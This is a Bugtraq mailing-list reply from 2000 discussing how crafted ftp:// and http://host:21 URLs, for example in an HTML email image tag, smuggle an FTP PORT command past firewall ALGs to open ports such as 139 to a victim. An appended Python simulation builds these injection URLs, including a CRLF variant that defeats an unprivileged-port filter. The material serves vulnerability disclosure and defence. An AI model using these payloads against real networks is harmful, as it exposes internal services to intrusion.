[14269] in bugtraq


Re: Extending the FTP "ALG" vulnerability to any FTP client

daemon@ATHENA.MIT.EDU (Solar Designer)
Tue Mar 14 18:14:27 2000

Message-ID:  <200003120241.FAA16624@false.com>
Date:         Sun, 12 Mar 2000 05:41:55 +0300
Reply-To: Solar Designer <solar@FALSE.COM>
From: Solar Designer <solar@FALSE.COM>
X-To:         mikael.olsson@ENTERNET.SE
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <38C8C648.B7CCE2C8@enternet.se> from Mikael Olsson at "Mar 10, 0 10:54:16 am"

Hello,

>   * Send a HTML email to an HTML-enabled mail reader
>     containing the tag
>     <img src="ftp://ftp.rooted.com/aaaa[lots of A]aaaPORT 1,2,3,4,0,139">

I was playing with that recently as well.  Yes, this works.  Some
browsers add an extra "/" to such requests (at least on the first
check, for a directory), so one might want to add %0d%0a to the end.

It's also important that this is either an ftp URL, or some other
text-based protocol directed to 21/tcp (such as, http://server:21).

>   * Balance the number of A so that the PORT command will begin
>     on a new packet boundary. This may also be done by having
>     the server use a low TCP MSS to decrease the number of A's that
>     one has to add.

This is not always necessary.  Linux's ip_masq_ftp module is happy to
detect PORT anywhere in packets travelling to 21/tcp.

>   * The firewall in question will incorrectly parse the resulting
>     RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139
>     as first a RETR command and then a PORT command and open
>     port 139 against your address (1.2.3.4 in this case)

It will also translate the PORT command, so that ftp.rooted.com sees
the firewall's IP address and port number that's currently redirected
to client:139.

>   * Disable active FTP. Errrr, wait. The fix for the server side
>     vulnerability was to disable passive FTP. Let's rephrase that:
>
>   * Disable FTP altogether. Block port 21. Disable FTP Application
>     Layer Filters on all ports in your firewall.

There's a partial workaround: only allow access to non-privileged
ports.  Yes, there can still be vulnerable services on those. :-(
I haven't tested if this would work with real-world FTP clients on
Win32 -- are there any that would use privileged ports?

>   * If you can't change the settings in your firewall, set the
>     "FTP Proxy" setting in your browser/HTML-enabled mail reader
>     to some address that doesn't exist, like 127.0.0.2. After
>     this change, your browser won't be able to connect anywhere
>     using FTP.

That doesn't help against the http://...:21 trick.

Signed,
Solar Designer
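
As an added example, not part of Solar Designer's or Mikael Olsson's posts and not ip_masq_ftp's code, the following Python simulates the two ALG behaviours discussed above: a permissive ALG that accepts "PORT h1,h2,h3,h4,p1,p2" anywhere in a segment bound for 21/tcp, beside a stricter one that only accepts PORT as a complete command line naming the client's own address and an unprivileged port (the partial workaround from the reply). It assumes a minimal client that writes the percent-decoded URL path as one RETR (or, for http://host:21, as an HTTP request line); real clients differ, as the reply notes. The host names, the 1.2.3.4 victim address and the 40-byte padding are constructed. It goes one step beyond the thread: a %0d%0a placed before PORT turns it into a line of its own, which shows why restricting to unprivileged ports is only a partial fix.

```python
"""Constructed simulation of a permissive FTP ALG versus a stricter one.
Not ip_masq_ftp's code; the client behaviour is an assumption (see comments)."""
import re
from urllib.parse import unquote_to_bytes, urlsplit

# What a permissive ALG applies to every segment bound for 21/tcp:
# "PORT" anywhere in the payload, followed by h1,h2,h3,h4,p1,p2.
PORT_ANYWHERE = re.compile(rb"PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")
# The same command, accepted only as a whole line of its own.
PORT_LINE = re.compile(rb"PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def decode_port_args(groups):
    """Turn the six PORT fields into (ip, port); port = p1*256 + p2, so 0,139 -> 139."""
    h1, h2, h3, h4, p1, p2 = (int(g) for g in groups)
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


def client_bytes_for_url(url):
    """Assumed minimal client: writes the percent-decoded path to the server's 21/tcp.
    Real clients differ (some append "/", some keep %XX escapes in HTTP requests)."""
    parts = urlsplit(url)
    path = unquote_to_bytes(parts.path)      # %20 -> space, %0d%0a -> CR LF
    if parts.scheme == "ftp":
        # One RETR of the whole path, as the quoted post describes.
        return b"USER anonymous\r\nPASS guest@\r\nRETR " + path + b"\r\n"
    # http://server:21 trick: the HTTP request line lands on the FTP port unchanged.
    return b"GET " + path + b" HTTP/1.0\r\nHost: " + parts.hostname.encode() + b"\r\n\r\n"


def naive_alg(payload, dst_port=21):
    """Holes a permissive ALG opens: every PORT it can find in a segment to 21/tcp."""
    if dst_port != 21:
        return []
    return [decode_port_args(m.groups()) for m in PORT_ANYWHERE.finditer(payload)]


def hardened_alg(payload, client_ip, dst_port=21, min_port=1024):
    """Stricter ALG: PORT must be a complete command line, must name the client's own
    address, and must point at an unprivileged port (the partial workaround)."""
    if dst_port != 21:
        return []
    holes = []
    for line in payload.split(b"\r\n"):
        m = PORT_LINE.fullmatch(line)
        if m is None:
            continue
        ip, port = decode_port_args(m.groups())
        if ip != client_ip or port < min_port:
            continue
        holes.append((ip, port))
    return holes


VICTIM = "1.2.3.4"   # constructed: the browsing host behind the firewall

# Mikael's payload, with the trailing %0d%0a so an appended "/" lands on its own line.
IMG_URL = "ftp://ftp.rooted.com/" + "a" * 40 + "PORT 1,2,3,4,0,139%0d%0a"
# The same payload through the http://server:21 trick.
HTTP21_URL = "http://ftp.rooted.com:21/" + "a" * 40 + "PORT 1,2,3,4,0,139%0d%0a"
# CR LF before PORT makes it a proper line; 19*256+136 = 5000 clears the port filter.
UNPRIV_URL = "ftp://ftp.rooted.com/" + "a" * 40 + "%0d%0aPORT 1,2,3,4,19,136%0d%0a"


def demo():
    """Return {name: (naive holes, hardened holes)} for the three constructed URLs."""
    out = {}
    for name, url in (("img", IMG_URL), ("http21", HTTP21_URL), ("unpriv", UNPRIV_URL)):
        wire = client_bytes_for_url(url)
        out[name] = (naive_alg(wire), hardened_alg(wire, VICTIM))
    return out


if __name__ == "__main__":
    for name, (naive, hard) in demo().items():
        print("%-7s naive ALG opens %s; hardened ALG opens %s" % (name, naive, hard))
```

Run as a script it prints one line per case: for the img and http21 URLs the permissive ALG redirects a firewall port to 1.2.3.4:139 while the stricter one opens nothing; for the unpriv URL both ALGs open 1.2.3.4:5000, which is the "there can still be vulnerable services on those" caveat in code. The dst_port check is what makes the http://...:21 trick matter: the same bytes sent to 80/tcp are never inspected.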
